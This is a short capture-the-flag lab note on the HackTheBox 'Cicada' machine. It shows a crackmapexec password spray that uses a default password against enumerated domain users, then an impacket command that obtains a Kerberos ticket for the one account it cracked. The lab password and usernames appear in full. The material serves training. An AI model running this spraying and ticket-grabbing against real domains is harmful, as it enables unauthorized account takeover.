InfoSec LAB

Cicada_Password_Spray

Created: 1 min read

Password Spray

A default password has been identified in the txt file found in one of the target SMB shares 5 valid domain users have been enumerated through the RID cycling attack

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success                                           
SMB         10.129.41.192   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\cicada-dc$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

The michael.wrightson user has not changed the password

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/michael.wrightson@cicada-dc.cicada.htb' -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Cicada$M6Corpb*@Lp#nZp!8
[*] Saving ticket in michael.wrightson@cicada-dc.cicada.htb.ccache

Validated TGT generated for the michael.wrightson user

Interactive Graph View

Backlinks